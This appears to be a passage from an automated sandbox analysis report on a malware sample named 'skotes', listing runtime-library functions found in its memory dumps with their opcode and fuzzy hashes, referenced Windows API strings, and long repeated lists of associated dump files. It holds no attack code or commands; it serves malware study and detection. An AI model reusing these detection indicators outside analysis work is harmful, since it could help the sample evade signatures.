                                                                                                                                                                • Opcode ID: 90ae351bac11b7e3e1378e046bf7090af4dd0bf003c95b30a1e949f2edd2ad9c
                                                                                                                                                                • Instruction ID: 46abbf6d0240ee2ac9264fb8da44863c42f600ddf3253c334fa50c4a8cdc9c5b
                                                                                                                                                                • Opcode Fuzzy Hash: 90ae351bac11b7e3e1378e046bf7090af4dd0bf003c95b30a1e949f2edd2ad9c
                                                                                                                                                                • Instruction Fuzzy Hash: 0801286154571A3EA730BB786CC2EBB65ECDE4272873019BBF401E7272FDA5E8008264
                                                                                                                                                                APIs
                                                                                                                                                                • StructuredWorkStealingQueue.LIBCMT ref: 00BB20B7
                                                                                                                                                                  • Part of subcall function 00BACAF3: Mailbox.LIBCMT ref: 00BACB2D
                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BB20C8
                                                                                                                                                                • StructuredWorkStealingQueue.LIBCMT ref: 00BB20FE
                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BB210F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                • String ID: e
                                                                                                                                                                • API String ID: 1411586358-4024072794
                                                                                                                                                                • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                • Instruction ID: 68a2fb2df773055d24f455e87365d2eaf0ed1b76576becf15e1a9e5e0e7d3afa
                                                                                                                                                                • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                • Instruction Fuzzy Hash: 46118F31500105ABDB15EF6DC8816FB77E5EF02364B5481EABC06AF202DAF1D901CBA0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • kernel32.dll, xrefs: 00B9D04C
                                                                                                                                                                • WakeAllConditionVariable, xrefs: 00B9D069
                                                                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B9D03B
                                                                                                                                                                • SleepConditionVariableCS, xrefs: 00B9D05D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___scrt_fastfail
                                                                                                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                • API String ID: 2964418898-3242537097
                                                                                                                                                                • Opcode ID: dbdbf598b16a6c0cc9fc16d124c7fbd5b39305de536e7a585782b052d673bb8f
                                                                                                                                                                • Instruction ID: 326eeb3a0f83ef1d62f9de6e62983169d3f02a01b086528d598dcf9d484799d4
                                                                                                                                                                • Opcode Fuzzy Hash: dbdbf598b16a6c0cc9fc16d124c7fbd5b39305de536e7a585782b052d673bb8f
                                                                                                                                                                • Instruction Fuzzy Hash: 6301D620782B51AAFF303B7A5C11E5B61C8CF92B4CF0615B5FD00F72A0EEA1EC018561
                                                                                                                                                                APIs
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00BC4C98
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00BC4D5E
                                                                                                                                                                • __freea.LIBCMT ref: 00BC4DCA
                                                                                                                                                                  • Part of subcall function 00BBB04B: RtlAllocateHeap.NTDLL(00000000,670DF653,?,?,00B9D3FC,670DF653,?,00B97A8B,?,?,?,?,?,?,00B87465,?), ref: 00BBB07E
                                                                                                                                                                • __freea.LIBCMT ref: 00BC4DD3
                                                                                                                                                                • __freea.LIBCMT ref: 00BC4DF6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1423051803-0
                                                                                                                                                                • Opcode ID: 45eaaa9486de05b207248df07a818a16de7632843ac3a897c9c824b6b37a89d9
                                                                                                                                                                • Instruction ID: 6a016d573a0a6591dd514e95bc6808df871b22c93e7bef99b102611fd79bd18b
                                                                                                                                                                • Opcode Fuzzy Hash: 45eaaa9486de05b207248df07a818a16de7632843ac3a897c9c824b6b37a89d9
                                                                                                                                                                • Instruction Fuzzy Hash: 6F51D272600206AFEB21AF64DC91FBB3BE9DF84750F2505ADFD05A7151EBB0DE1086A0
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00BAE91E
                                                                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00BAE926
                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00BAE950
                                                                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00BAE959
                                                                                                                                                                • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00BAE9DC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
